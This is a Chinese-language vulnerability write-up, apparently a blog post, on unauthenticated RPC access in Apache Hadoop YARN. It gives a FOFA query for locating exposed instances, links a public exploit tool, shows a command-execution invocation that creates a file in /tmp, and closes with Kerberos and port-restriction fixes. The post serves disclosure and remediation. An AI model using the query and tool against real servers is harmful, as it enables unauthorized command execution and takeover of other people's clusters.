Hadoop Yarn RPC未授权访问漏洞

在这里插入图片描述

💬 漏洞详情

Apache Hadoop YARN (Yet Another Resource Negotiator)是一种新的 Hadoop 资源管理器,它是一个通用资源管理系统,可为上层应用提供统一的资源管理和调度,它的引入为集群在利用率、资源统一管理和数据共享等方面带来了巨大好处。

Hadoop Yarn默认对外开放RPC服务,攻击者可利用RPC服务执行任意命令,进而控制服务器。同时由于Hadoop Yarn RPC服务访问控制机制开启方式与REST API不一样,因此即使在 REST API有授权认证的情况下,RPC服务所在端口仍然可以未授权访问。

💢影响版本

  • 全版本

📢 复现环境

Vulfous

👀FOFA语法

app="APACHE-hadoop-YARN"

🐓漏洞利用

在此感谢师傅的利用工具tql💪

https://github.com/cckuailong/YarnRpcRCE

在这里插入图片描述

在这里插入图片描述
工具使用

java -jar YarnRpcUnauth.jar ip:port "touch /tmp/success"

在这里插入图片描述
在这里插入图片描述

🔑漏洞修复

(临时修复建议)

  1. Apache Hadoop官方建议用户开启Kerberos认证。
  2. 设置 Hadoop RPC服务所在端口仅对可信地址开放。
  3. 建议升级并启用Kerberos的认证功能,阻止未经授权的访问。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇

)">
下一篇>>